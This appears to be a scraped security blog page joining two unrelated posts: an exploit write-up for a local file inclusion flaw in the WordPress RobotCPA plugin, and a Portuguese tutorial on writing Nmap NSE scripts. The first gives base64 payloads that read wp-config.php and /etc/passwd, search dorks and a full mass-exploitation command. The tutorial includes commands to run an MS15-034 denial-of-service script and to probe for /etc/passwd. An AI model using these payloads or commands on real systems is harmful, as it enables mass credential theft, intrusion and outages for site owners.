WordPress RobotCPA Plugin V5 - Local File Inclusion - MASS EXPLOIT INURLBR

Exploring theme Plugin RobotCPA V5 CMS wordpress

Exploit Title: Wordpress Plugin RobotCPA V5 - Local File Include
Exploit Author: T3N38R15
Vendor Homepage: http://robot-cpa.good-info.co/
Version: 5V
Tested on: Windows (Firefox) / Linux (Firefox)
Acess: https://www.exploit-db.com/exploits/37252/

The affected file is f.php and the get-parameter "l" is vulnerable to local file inclusion.
We just need to base64 encode our injection.

POC:

string exploit:
php://filter/resource=./../../../wp-config.php
base64: cGhwOi8vZmlsdGVyL3Jlc291cmNlPS4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==

string exploit: 
file:///etc/passwd
base64: 
ZmlsZTovLy9ldGMvcGFzc3dk

Exemple Injetion:
http://domain.com/wp-content/plugins/robotcpa/f.php?l={STRING_BASE64_XPL}

Mass exploitation with inurlbr
using get exploration parameters and scanner internal encoder

Exemple:
--exploit-get {you_get}
--exploit-get  "&index.php?id=10'´0x27"

base64 Encrypt values in base64.
     Example: base64({value})
     Usage:   base64(102030)
     Usage:   --exploit-get 'user?id=base64(102030)'

Let's use:
--exploit-get "&l=base64(file:///etc/passwd)"
or
--exploit-get "&l=base64(php://filter/resource=./../../../wp-config.php)"

Dork:
inurl:"/wp-content/plugins/robotcpa/"
inurl:"plugins/robotcpa/f.php?l="

Complete command
php inurlbr.php --dork 'inurl:"plugins/robotcpa/f.php?l="' --exploit-get "&l=base64(file:///etc/passwd)" -s vuln.txt -q 1,2,3,64

Internal validation script inurlbr

Exploring the server password file...

LOCAL FILE INCLUSION
Local File Inclusion (also known as LFI) is the process of including  files, that are already locally present on the server, through the  exploiting of vulnerable inclusion procedures implemented in the  application. 
https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion
$validation['LOCAL-FILE-INCLUSION-01'] = '/root:/';
$validation['LOCAL-FILE-INCLUSION-02'] = 'root:x:0:0:';
$validation['LOCAL-FILE-INCLUSION-03'] = 'mysql:x:';
Finding any of these values the script alert as vulnerable.
Exploring the server wp-config.php file...

CMS WORDPRESS
As the name suggests, if the web application doesn’t check the file name required by the user, any malicious user can exploit this vulnerability to download sensitive files from the server.
Arbitrary File Download vulnerability file wp-config.php
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271
http://www.acunetix.com/vulnerabilities/web/wordpress-plugin-slider-revolution-arbitrary-file-disclosure
$validation['CMS-WORDPRESS-01'] = "define('DB_NAME'";
$validation['CMS-WORDPRESS-02'] = "define('DB_USER'";
$validation['CMS-WORDPRESS-03'] = "define('DB_PASSWORD'";
$validation['CMS-WORDPRESS-04'] = "define('DB_HOST'";
Finding any of these values the script alert as vulnerable.

OUTPUT: 

Download:
http://github.com/googleinurl/SCANNER-INURLBR

Nmap Scripting Engine (NSE) - Escrevendo o meu primeiro script

                            Introdução

O Nmap Scripting Engine (NSE) é um dos recursos mais poderosos e flexíveis do Nmap. Ele permite aos usuários escrever (e partilhar) scripts simples para automatizar uma ampla variedade de tarefas de rede. Esses scripts são executados em paralelo com a velocidade e eficiência que se espera do Nmap. Os usuários podem contar com a crescente e diversificada base de dados de scripts distribuídos com o Nmap, ou escrever o seu próprio para atender às necessidades personalizadas, os scripts Nmap Scripting Engine são implementados usando linguagem de programação Lua, Nmap API e um número de realmente poderosas Bibliotecas NSE.
LUA: Lua Tutorials - www.dev-hq.net   NMAP API: Nmap API   NSEDOC: nsedoc (nse)


Os scripts NSE são (pack) em diferentes categorias:
auth, broadcast, brute, default, discovery, dos, exploit, external, fuzzer, intrusive, malware, safe,vuln
configuando o nosso script NSE dentro de uma destas categorias permite-nos chama-lo a ele e todos
os scripts dentro dessa mesma categoria usando a 'flag' (--script <categoria> <target>). o seguinte
exemplo "irá correr o nosso script e todos que se encontrarem dentro da categoria 'discovery'"
exemplo: nmap -sS -Pn -p 80 --script discovery <target>


Os scripts NSE são divididos em 4 secções:
O 'HEAD' contém meta-dados que descreve a funcionalidade do modulo, autor, impacto, categoria e outros dados descritivos.
As 'DEPENDENCIES' (bibliotecas lua necessarias) ao uso da API de programação do nmap
A 'RULE SECTION' define as condições necessárias para o script executar. Esta secção deve conter pelo menos uma função desta lista: portrule, hostrule, prerule, postrule. Para os fins deste tutorial (e a maioria dos scripts), vou concentrar-se no portrule que pode executar verificações sobre ambas as propriedades de host e porta antes de correr o script. No script abaixo, portrule se aproveita da API do nmap para verificar se há alguma porta http aberta para executar os commands da secção 'the action section'.
A 'ACTION SECTION' define a lógica do script, Na tradição de K&R (kernighan & ritchie) eu vou simplesmente dar a saída "Olá, mundo!" para qualquer porta aberta http usando a API 'return' para fazer o output.
           


                            

hello.nse

Vamos começar com um script que simplesmente irá imprimir "hello world" para todas as portas HTTP encontradas abertas.
                             Abra um editor de texto e escreva o seguinte trecho em 'hello.nse' em seu diretório home.

1. ------------------------------ The Head Section ------------------------------
2. description = [[
3. Author: r00t-3xp10it
4. INURLBR AULA - escrevendo o meu primeiro script NSE para o nmap
6. Some Syntax examples:
7. nmap --script-help hello.nse
8. nmap -sS -Pn -p 80 --script hello.nse <target>
9. ]]
11. author = "r00t-3xp10it"
12. categories = {"discovery", "safe"}
14. ------------------------------ Dependencies ------------------------------
15. local http = require "http"
16. local shortport = require "shortport"
18. ------------------------------ The Rule Section ------------------------------
19. portrule = shortport.http
21. ------------------------------ The Action Section ------------------------------
22. action = function(host, port)
23.     return "Hello world!"
24. end

Descrição: na secção 'head' definimos a categoria como 'discovery and safe', para correr este script e todos contidos na categoria 'discovery' basta executarmos 'nmap -sV -p 80,8080 --script discovery <target>', na secção 'Dependencies' chamamos as bibliotecas 'http & shortport', na secção 'the rule section' vamos nos servir da biblioteca 'shortport' para verificar se o <target> está a correr alguma porta com o protocol 'http' abertas, para podermos executar a secção 'the action section' a 'funtion(host, port)' vai executar o command "hello world!" (display no terminal), P.S. a portrule 'shortport.http' verifica todos os protocolos http based, like: http, https, ipp, http-alt, https-alt, vnc-http, oem-agent, soap, http-proxy, (descrição da biblioteca 'shortport.lua')...

shortport.http: https://nmap.org/nsedoc/lib/shortport.html#http

shortport.lua: nmap.org/nmap/nselib/shortport.lua

hello.nse output:

exporte o script para a base de dados do nmap ('/nmap/scripts/' folder)

sudo cp hello.nse /usr/share/nmap/scripts/hello.nse

actualize a base de dados do NSE

sudo nmap --script-updatedb

visualizar a descrição do modulo

sudo nmap --script-help hello.nse

corra o script

sudo nmap -sV -Pn -p 80,443,445,8080 --script hello.nse <target>

file-checker.nse

Vamos construir um Script NSE rápido para verificar se o /path/arquivo/pasta selecionado existe no alvo webserver verificando os codigos de retorno da API do google. "o comportamento padrão será procurar o arquivo robots.txt se não for introduzido um argumento (@args) para procurar um file/path diferente", os '@argumentos' são lançados pela 'flag' --script-args <nome do argumento>=  neste caso vai servir para pedir ao utilizador para entrar um nome diferente do valor default (/robots.txt) a procurar no target, vamos construir o proximo script em 4 secções 'head, dependencies, the rules section, the action section' para mais facil compreenção:


---'THE HEAD SECTION'---

1. description = [[
3. Author: r00t-3xp10it
4. Quick NSE script to check if the selected file/path/folder exists
5. on target webserver by checking google API return codes.
6. 'default behavior its to search for robots.txt file'
8. Some Syntax examples:
9. nmap -sS -Pn -p 80 --script file-checker.nse <target>
10. nmap -sS -Pn -p 80 --script file-checker.nse --script-args file=/privacy/ <target>
11. nmap -sS -sV -iR 40 -p 80 --open --script file-checker.nse --script-args file=/robots.txt
12. ]]
14. ---
15. -- @usage
16. -- nmap --script-help file-checker.nse
17. -- nmap -sS -Pn -p 80 --script file-checker.nse <target>
18. -- nmap -sS -Pn -p 80 --script file-checker.nse --script-args file=/robots.txt <target>
19. -- nmap -sS -Pn -p 80 --script file-checker.nse --script-args file=/privacy/ 113.38.34.72
20. -- @output
21. -- PORT   STATE SERVICE
22. -- 80/tcp open  http
23. -- | file-checker: /robots.txt
24. -- |             : STRING FOUND...
25. -- |_            : returned 200 OK
26. -- @args file-checker.file the file/path name to search. Default: /robots.txt
27. ---
29. author = "r00t-3xp10it"
30. license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
31. categories = {"discovery", "safe"}
32. 
    

---'DEPENDENCIES'---

1. -- Dependencies (lua libraries)
2. local shortport = require "shortport"
3. local stdnse = require ('stdnse')
4. local http = require "http"

shortport: https://nmap.org/nsedoc/lib/shortport.html

stdnse: https://nmap.org/nsedoc/lib/stdnse.html

http: https://nmap.org/nsedoc/lib/http.html 

---'THE RULES SECTION'---

1. -- Port rule will only execute if port 80/tcp http is open
2. portrule = shortport.port_or_service({80}, "http", "tcp", "open")
3. -- Seach for string stored in variable @args.file or use default
4. local file = stdnse.get_script_args(SCRIPT_NAME..".file") or "/robots.txt"

Descrição: a biblioteca 'shortport' vai se servir da função 'port_or_service' para só executar a secção 'the action section' se todos os valores retornarem correctos (port 80 tcp http open), a biblioteca 'stdnse.get_script_args' vai ler o que foi inserido no @argumento (e procurar por essa string) ou então vai procurar pelo valor default (/robots.txt) se não for utilizada a 'flag' '--script-args file=' 

'shortport.port_or_service': nsedoc/lib/shortport.html#port_or_service 'stdnse.get_script_args': nsedoc/lib/stdnse.html#get_script_args


---'THE ACTION SECTION'---

1. action = function(host, port)
2. local response = http.get(host, port, file)
4. -- Check google API return codes to determine if file exists
5. if (response.status == 200 ) then
6. return file.."\n            : STRING FOUND...\n            : returned 200 OK\n"
7. elseif (response.status == 400 ) then
8. return file.."\n            : BadRequest...\n            : returned 400 BadRequest\n"
9. elseif (response.status == 302 ) then
10. return file.."\n            : Redirected...\n            : returned 302 Redirected\n"
11. elseif (response.status == 401 ) then
12. return file.."\n            : Unauthorized...\n            : returned 401 Unauthorized\n"
13. elseif (response.status == 404 ) then
14. return file.."\n            : STRING NOT FOUND...\n            : returned 404 NOT FOUND\n"
15. elseif (response.status == 403 ) then
16. return file.."\n            : Forbidden...\n            : returned 403 Forbidden\n"
17. elseif (response.status == 503 ) then
18. return file.."\n            : Service_unavailable...\n            : returned 503 Service_unavailable\n"
19. else
20. return file.."\n            : UNDEFINED ERROR...\n            : returned "..response.status.."\n"
21. end
22. end

Descrição: a função 'action = function(host, port)' vai executar os commands no <target>, na função seguinte a biblioteca 'http.get' retorna um recurso com um pedido GET, a API NSE  'response.status' vai verificar o codigo de retorno da API do google para determinar se o file existe, e vamos nos servir da API 'return' vai fazer o display do output...

'http.get': nmap.org/nsedoc/lib/http.html#get
file-checker.nse output:

download file-checker.nse: file-checker.nse

exporte o script para a base de dados do nmap ('/nmap/scripts/' folder)

sudo cp file-checker.nse /usr/share/nmap/scripts/file-checker.nse

actualize a base de dados do NSE

sudo nmap --script-updatedb

visualizar a descriçao do modulo

sudo nmap --script-help file-checker.nse

corra o script

sudo nmap -sV -Pn -p 80,443,445,8080 --script file-checker.nse <target>

sudo nmap -sV -Pn -p 80,443,445,8080 --script file-checker.nse --script-args file=/etc/passwd <target>    

ms15-034.nse

Detecta a vulnerabilidade MS15-034 (HTTP.sys) em servidores Microsoft IIS. e explora a condição denial-of-service usando argumentos de script (--script-args D0S=exploit) ou podemos verificar (escanear) ainda mais usando outro argumento (--script-args uri =/wellcome.png), o comportamento padrão 'default' será verificar pela existencia da vulnerabilidade, e só se for introduzido o @argumento D0S (--script-args D0S=exploit) é que será explorado o denial-of-service.

versões afetadas são o Windows 7,8,8.1, Windows Server 2008 R2, 2012 e 2012R2.
An analysis of ms15-034: an-analysis-of-ms15-034

1º - download ms15-034.nse: ms15-034.nse

 2º - exporte o script para a base de dados do nmap ('/nmap/scripts/' folder)

sudo cp ms15-034.nse /usr/share/nmap/scripts/ms15-034.nse

3º - actualize a base de dados do NSE

sudo nmap --script-updatedb

4º - visualizar a descriçao do modulo

sudo nmap --script-help ms15-034.nse

5º - corra o script

sudo nmap -sV -Pn -p 80 --script ms15-034.nse <target>

sudo nmap -sV -Pn -p 80,443,445,8080 --script ms15-034.nse --script-args D0S=exploit <target>

How To Display outputs:

usando return

1. -- writting output to table (using return)
2. if (response.status == 200) then
3. return file.." FOUND..."
5.   elseif (response.status == 404) then
6.   return file.." NOT FOUND..."
8. else
10.   return file.." undefined"..response.status
11.   end
12. end

usando table.insert

2. --writting output to table (using 'table.insert')
3. if (response.status == 200) then
4.   table.insert(response, "  STRING FOUND: "..file)
5.   table.insert(response, "  returned 200 OK")
7.   elseif (response.status == 404) then
8.   table.insert(response, "  STRING NOT FOUND: "..file)
9.   table.insert(response, "  returned 404 NOT FOUND")
11. else
13.   table.insert(response, "  STRING : "..file)
14.   table.insert(response, "  returned "..response.status)
15. end
16. 
    
17. --writting response output to table
18. return stdnse.format_output(true, response)
19. end

usando stdnse.output_table()

1. -- writting output to table using stdnse.output_table()
2. -- THE RULES SECTION --
3. local file = stdnse.get_script_args(SCRIPT_NAME..".file") or "/robots.txt"
4. local output = stdnse.output_table()  -- fazendo table em 'the rules section'
7. -- THE ACTION SECTION --
8. if (response.status == 200) then
9.   output.found = {}
10.   output.found[#output.found + 1] = file
11.   output.found[#output.found + 1] = "/privacy/"
12.   output.found[#output.found + 1] = "/news/"
13.   return output
15. elseif (response.status == 404) then
16.   output.found = {}
17.   output.found[#output.found + 1] = file
18.   output.found[#output.found + 1] = "/privacy/"
19.   output.found[#output.found + 1] = "/news/"
20.   return output
22. else
23.   output.found = {}
24.   output.found[#output.found + 1] = file
25.   output.found[#output.found + 1] = "/privacy/"
26.   output.found[#output.found + 1] = "/news/"
27.   return output
29. end
30. return output
31. end